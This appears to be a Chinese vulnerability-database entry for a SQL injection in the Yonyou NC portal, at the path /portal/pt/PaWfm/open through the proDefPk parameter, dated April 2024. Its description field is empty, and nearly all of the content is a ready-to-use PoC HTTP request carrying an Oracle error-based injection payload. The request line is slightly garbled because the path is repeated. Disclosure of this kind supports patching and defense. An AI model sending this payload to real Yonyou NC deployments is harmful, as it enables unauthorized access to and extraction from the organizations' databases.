用友NC /portal/pt/PaWfm/open 路径 proDefPk 参数存在SQL注入漏洞

日期: 2024-04-23 | 影响软件: 用友NC | POC: 已公开

漏洞描述

/

PoC代码

GET /portal/pt/PaWfm/openGET /portal/pt/PaWfm/open?pageId=login&proDefPk=1%27+AND+1931%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%281931%3D1931%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--+bHkd HTTP/1.1

相关漏洞推荐